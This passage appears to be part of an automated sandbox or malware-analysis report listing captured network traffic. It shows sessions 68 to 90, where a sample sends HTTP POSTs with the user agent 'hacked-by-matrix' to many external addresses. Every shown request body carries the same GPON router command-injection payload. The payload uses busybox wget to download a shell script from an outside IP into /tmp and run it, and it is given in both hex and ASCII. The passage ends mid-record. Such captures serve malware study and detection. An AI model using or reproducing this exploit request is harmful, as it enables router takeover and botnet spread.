                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.133400042.118.47.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433037043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.135673842.109.60.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433039904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.1350192109.168.76.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433068991 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.1335082118.116.241.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433084011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.1349350109.119.26.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433106899 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.1346396118.42.52.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433162928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.1346288118.47.210.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433186054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.1341558109.53.100.156443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433212996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.135553642.234.35.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433240891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.13480765.40.155.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433273077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.13483925.5.91.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433303118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.1343684212.45.10.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433367968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.13533405.237.90.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433367968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.13516825.238.107.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433404922 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.1335210118.176.36.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433423042 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.1346112212.182.167.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433489084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.13592385.100.254.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433516026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.1352868118.64.187.253443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433525085 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.1350860109.50.91.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433548927 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.1334858118.161.105.157443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433615923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.1338236212.44.166.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433640003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.1345430118.134.170.185443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433698893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.133770442.229.171.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.433717012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
